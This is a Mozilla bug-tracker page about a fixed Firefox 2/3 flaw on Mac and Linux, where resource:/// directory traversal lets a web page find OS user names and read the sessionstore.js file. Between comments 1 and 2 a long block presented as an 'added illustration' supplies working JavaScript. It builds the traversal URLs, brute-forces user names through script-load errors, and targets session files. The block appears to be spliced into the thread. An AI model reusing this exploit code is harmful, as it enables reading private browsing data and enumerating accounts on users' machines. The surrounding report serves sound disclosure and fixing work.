Resource Directory Traversal Vulnerability - Mac OS X and Linux Example

Status: RESOLVED FIXED
Product: Core
Component: Security
Reported: 9 years ago
Modified: 9 years ago

People

(Reporter: Gregory Fleischer, Assigned: dveditz)

Tracking

({verified1.8.1.17, verified1.9.0.2})

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [sg:dupe 380994])

Attachments

(1 attachment)

(Reporter)

Description

9 years ago
User-Agent:       Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12

On Mac OS X and Linux, the "resource:///" directory traversal described in bug 394075 can be used to reach any file on the file system.

Because there is a different error returned for JavaScript for non-existent files versus files that have syntax errors, a brute-force attack could be mounted to determine the OS user name by attempting to source script files from their home directory.

If the operating system user name can be brute-forced (or otherwise determined) and the profile value determined through an information leak, the "sessionstore.js" file can be read if it is stored in the default location.


Reproducible: Always

(Reporter)

Comment 1

9 years ago
Created attachment 303195
Example that shows reading from sessionstore.js if username and profile value are known

If the OS user name and profile value can be determined, it is possible to read the sessionstore.js file.

Note also that different errors are returned for invalid (or unreachable) user name values compared to users that exist.
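The user-name oracle described in the report and in comment 1, as an added illustration that is not attachment 303195 and not Mozilla code. It assumes what the report states and nothing more: the resource:/// handler maps onto an install directory and lets "../" climb out of it (the depth of 8 is a guess that over-shoots so the surplus "../" clamp at "/"), a missing file fails to load and fires the script element's error event, a readable non-JavaScript file loads and raises a SyntaxError that reaches window.onerror, and %-encoding is decoded before the path reaches the filesystem. The probe files per platform, the sessionstore.js default locations and the candidate user names are assumptions chosen for the example; the way the attachment actually reads sessionstore.js contents is not on this page and is not reproduced.

```javascript
// Added illustration of the user-name oracle described in this bug; it is not
// attachment 303195. Assumptions: resource:/// maps onto a fixed install dir
// and lets ".." climb out of it, a missing file fails to load (script "error"
// event) while a readable non-JS file loads and raises a SyntaxError that
// reaches window.onerror, and %-encoding is decoded before the filesystem.

var TRAVERSAL_DEPTH = 8; // more "../" than the install dir is deep: extras clamp at "/"

// Turn an absolute POSIX path into a resource:/// URL that escapes the root.
function buildProbeUrl(absPath, depth) {
  if (absPath.charAt(0) !== '/') throw new Error('absolute POSIX path required');
  if (depth === undefined) depth = TRAVERSAL_DEPTH;
  var up = new Array(depth + 1).join('../');
  var segs = absPath.slice(1).split('/');
  for (var i = 0; i < segs.length; i++) segs[i] = encodeURIComponent(segs[i]);
  return 'resource:///' + up + segs.join('/');
}

// A file present in a normal home directory that is not valid JavaScript
// (assumed defaults; pick whatever exists on the target platform).
function homeProbeFile(user, os) {
  return os === 'darwin'
    ? '/Users/' + user + '/Library/Preferences/com.apple.finder.plist'
    : '/home/' + user + '/.bashrc';
}

// Default sessionstore.js location once user name and salted profile dir are known.
function sessionStorePath(user, profileDir, os) {
  return os === 'darwin'
    ? '/Users/' + user + '/Library/Application Support/Firefox/Profiles/' + profileDir + '/sessionstore.js'
    : '/home/' + user + '/.mozilla/firefox/' + profileDir + '/sessionstore.js';
}

// What the observable outcomes of sourcing a URL reveal about the target file.
function classify(outcome) {
  if (outcome.loadError) return 'absent-or-unreadable';
  if (outcome.syntaxError) return 'exists';
  return 'exists-valid-js'; // fetched and parsed cleanly, i.e. the file is JS
}

// Browser-only: source one URL via <script> and report the classification.
function probe(url, done, timeoutMs) {
  var outcome = { loadError: false, syntaxError: false };
  var finished = false;
  var prevOnError = window.onerror;
  var s = document.createElement('script');
  function finish() {
    if (finished) return;
    finished = true;
    window.onerror = prevOnError;
    if (s.parentNode) s.parentNode.removeChild(s);
    done(classify(outcome));
  }
  window.onerror = function (msg, src) {
    if (src === url || /syntax/i.test(String(msg))) outcome.syntaxError = true;
    return true; // swallow the error so the probing page keeps running
  };
  s.onload = finish;
  s.onerror = function () { outcome.loadError = true; finish(); };
  s.src = url;
  document.getElementsByTagName('head')[0].appendChild(s);
  setTimeout(finish, timeoutMs || 2000);
}

// Brute-force a candidate list of OS user names, one probe at a time.
function findUsers(candidates, os, done) {
  var found = [];
  (function next(i) {
    if (i === candidates.length) return done(found);
    probe(buildProbeUrl(homeProbeFile(candidates[i], os)), function (verdict) {
      if (verdict !== 'absent-or-unreadable') found.push(candidates[i]);
      next(i + 1);
    });
  })(0);
}

// Usage from a page loaded in a vulnerable build (skipped outside a browser).
if (typeof document !== 'undefined') {
  var os = /Mac/.test(navigator.userAgent) ? 'darwin' : 'linux';
  findUsers(['alice', 'bob', 'admin'], os, function (users) {
    alert('accounts that exist: ' + users.join(', '));
  });
}
```

The helpers that build URLs and classify outcomes are pure and run anywhere; only probe() needs a browser, and it is written in 2008-era DOM JavaScript so it can be loaded in the builds named in the report. A timeout is treated as "loaded without error" so one stalled probe cannot wedge the loop; on a fixed build every verdict collapses to absent-or-unreadable, which is the check the verifier in comment 4 is effectively making.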
(Assignee)

Comment 2

9 years ago
This is basically a dupe of bug 380994, customized with a juicy target from the flat-chrome traversal bug. Very clever attempt to read the salted profile name. Another way to get that name: sometimes it can be read from uncaught exceptions thrown by add-on components (not code in chrome URIs, which isn't going to help much, but accompanying JavaScript XPCOM components, which will have file: URIs in the error).
Whiteboard: [sg:dupe 380994]
Assignee: nobody → dveditz
Component: Security → Security
Product: Firefox → Core
QA Contact: firefox → toolkit
(Assignee)

Comment 3

9 years ago
Fix for bug 380994 checked into 1.8 and 1.9.0 branches
Keywords: fixed1.8.1.17, fixed1.9.0.2
(Assignee)

Updated

9 years ago
Status: UNCONFIRMED → NEW
Ever confirmed: true

Comment 4

9 years ago
Verified on latest Mac/Linux build candidates for 2.0.0.17 and 3.0.2 using the test case in comment #1. When running the test case on 2.0.0.16 and 3.0.1 I could see the contents of my sessionstore.js file; on 2.0.0.17 and 3.0.2 nothing happens.

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/2008082909 Firefox/2.0.0.17
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/2008082909 Firefox/2.0.0.17

Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.0.2) Gecko/2008082909 Firefox/3.0.2
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008082909 Firefox/3.0.2
Keywords: fixed1.8.1.17, fixed1.9.0.2 → verified1.8.1.17, verified1.9.0.2
(Assignee)

Updated

9 years ago
Group: core-security
(Assignee)

Comment 5

9 years ago
bug 380994 checked in:
http://hg.mozilla.org/mozilla-central/rev/6dad95d60106
http://hg.mozilla.org/mozilla-central/rev/1eccc541661c
Status: NEW → RESOLVED
Last Resolved: 9 years ago
Resolution: --- → FIXED